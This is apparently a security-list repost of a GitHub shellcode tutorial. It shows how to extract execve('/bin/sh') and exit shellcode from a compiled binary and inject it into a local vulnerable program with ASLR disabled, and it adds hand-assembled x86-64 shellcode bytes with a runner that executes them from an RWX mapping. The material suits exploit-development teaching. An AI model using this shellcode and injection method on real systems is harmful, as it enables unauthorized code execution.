Channel: Penetration Test – Security List Network™

shellcode for execve penetration test.


Main Program:
1. exec /bin/sh with shellcode.
2. call sys_exit with shellcode.

[screenshots: shellcode-execve; debugging with gef]

Dependencies:
+ gcc on GNU/Linux
+ gdb

exec /bin/sh with shellcode:
————————————-
Steps
(1) Compile: " gcc shell.c -o shell "
(2) Find the start and end of the shellcode inside shell: " objdump -d shell | sed -n '/shell_start/,/shell_end/p' "
In my code, shell_start is 0x3de and shell_end is 0x3f8.
(3) Find the length of the expected shellcode: " echo $((0x3f8-0x3de)) "
The length is 26; we round it up to 32, the next multiple of 8.
(4) Use xxd to extract those 32 bytes at that offset as hex text: " xxd -s0x3de -l32 -p shell shellcode "
The last 6 of the 32 bytes are simply whatever follows shell_end in the binary. They are never executed when execve succeeds, but check that none of them is 0x00 either, since they travel with the payload.
(5) Compile the run program (make the script executable first with " chmod 755 cmpshell.sh "): " ./cmpshell.sh "
(6) Attack the vulnerable program with ASLR disabled and get a shell: " ((cat shellcode | xxd -r -p) ; cat) | setarch $(uname -m) -R ./victim "

Note:
1. There is no prompt in the shell because its standard input comes from the pipe, not from the terminal (/dev/tty). The trailing cat is what keeps the pipe open and forwards the commands you type to the shell.
2. The shellcode must not contain any NULL (0x00) byte: if the victim copies its input as a C string, the first 0x00 ends the copy and the payload is truncated.

call sys_exit with shellcode:
————————————-
Steps
(1) Compile: " gcc shell.c -o shell "
(2) Find the start and end of the shellcode inside shell: " objdump -d shell | sed -n '/shell_start/,/shell_end/p' "
In my code, shell_start is 0x3de and shell_end is 0x3e6.
(3) Find the length of the expected shellcode: " echo $((0x3e6-0x3de)) "
The length is exactly 8, so no rounding is needed.
(4) Use xxd to extract exactly those 8 bytes as hex text: " xxd -s0x3de -l8 -p shell shellcode "
(5) Compile the run program (make the script executable first with " chmod 755 cmpshell.sh "): " ./cmpshell.sh "
(6) Attack the vulnerable program with ASLR disabled. The result is that the victim process terminates, because the injected code calls sys_exit instead of spawning a shell: " ((cat shellcode | xxd -r -p) ; cat) | setarch $(uname -m) -R ./victim "

Note:
1. The shellcode must not contain any NULL (0x00) byte.
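As an added worked example for both sections above (this is not code from the harryskon repository, and the byte strings below are hand-assembled for this page rather than the author's shell.c), here are an x86-64 Linux execve("/bin/sh") shellcode and an exit shellcode as raw bytes, together with the two checks the build steps rely on: no 0x00 byte anywhere, and a length padded up to a multiple of 8. The exit stub is run in a forked child from an RWX mapping so that its exit status can be observed without terminating the program itself; running the execve stub the same way would spawn a shell in the child, so main() only reports on it. The exit status 42 is an arbitrary choice for this example.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20   /* Linux value, in case strict ISO mode hides it */
#endif

/* execve("//bin/sh", NULL, NULL): 26 bytes, no 0x00 anywhere.
   "//bin/sh" is used because it is exactly 8 bytes, so one mov fills it. */
const unsigned char execve_sc[] = {
    0x48, 0x31, 0xf6,                         /* xor  rsi, rsi         argv = NULL         */
    0x56,                                     /* push rsi              8-byte NUL terminator */
    0x48, 0xbf, 0x2f, 0x2f, 0x62, 0x69,
                0x6e, 0x2f, 0x73, 0x68,       /* mov  rdi, "//bin/sh"                      */
    0x57,                                     /* push rdi              string onto stack   */
    0x54, 0x5f,                               /* push rsp; pop rdi     rdi = &"//bin/sh"  */
    0x31, 0xc0, 0xb0, 0x3b,                   /* xor eax,eax; mov al,59   SYS_execve       */
    0x48, 0x31, 0xd2,                         /* xor  rdx, rdx         envp = NULL         */
    0x0f, 0x05,                               /* syscall                                   */
};

/* exit(42): 9 bytes, no 0x00 anywhere. 42 is an arbitrary, easy-to-spot status. */
const unsigned char exit_sc[] = {
    0x31, 0xc0, 0xb0, 0x3c,   /* xor eax,eax; mov al,60   SYS_exit */
    0x6a, 0x2a, 0x5f,         /* push 42; pop rdi         status   */
    0x0f, 0x05,               /* syscall                           */
};

/* Note 2 of both sections: offset of the first 0x00 byte, or -1 if none. */
long first_nul(const unsigned char *sc, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0x00)
            return (long)i;
    return -1;
}

/* Step (3)/(4): round a length up to the next multiple of 8, as the
   execve section does when it turns 26 into 32. */
size_t padded_len(size_t len)
{
    return (len + 7) & ~(size_t)7;
}

/* Run shellcode in a forked child from an RWX mapping and report how the
   child ended: its exit status, 127 if the mapping could not be created,
   -1 if the child was killed by a signal or we are not on x86-64 Linux. */
int run_in_child(const unsigned char *sc, size_t len)
{
#if !defined(__x86_64__) || !defined(__linux__)
    (void)sc; (void)len;
    return -1;                      /* the byte strings are x86-64 Linux specific */
#else
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED)
            _exit(127);
        memcpy(page, sc, len);
        void (*fn)(void);
        memcpy(&fn, &page, sizeof fn);  /* object-to-function pointer without a cast warning */
        fn();
        _exit(126);                     /* only reached if the shellcode returns */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
#endif
}

int main(void)
{
    printf("execve shellcode: %zu bytes, padded to %zu, first NUL at %ld\n",
           sizeof execve_sc, padded_len(sizeof execve_sc),
           first_nul(execve_sc, sizeof execve_sc));
    printf("exit shellcode:   %zu bytes, first NUL at %ld\n",
           sizeof exit_sc, first_nul(exit_sc, sizeof exit_sc));
    /* Only the exit stub is executed here; run_in_child(execve_sc, ...)
       would spawn an interactive /bin/sh in the child. */
    printf("exit shellcode ran in child, status = %d (expect 42)\n",
           run_in_child(exit_sc, sizeof exit_sc));
    return 0;
}
```

Build with " gcc -o sc_demo sc_demo.c " and run it; the same first_nul check is worth running over the full padded extraction (the 32 bytes in the execve section), not just the hand-written part, since the trailing bytes come from the binary and are not under your control.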

Usage & Download from git:

git clone https://github.com/harryskon/shellcode && cd shellcode
Change into the directory of the example you want inside the shellcode folder, then compile and run it by following the steps above one by one.

Source: https://github.com/harryskon

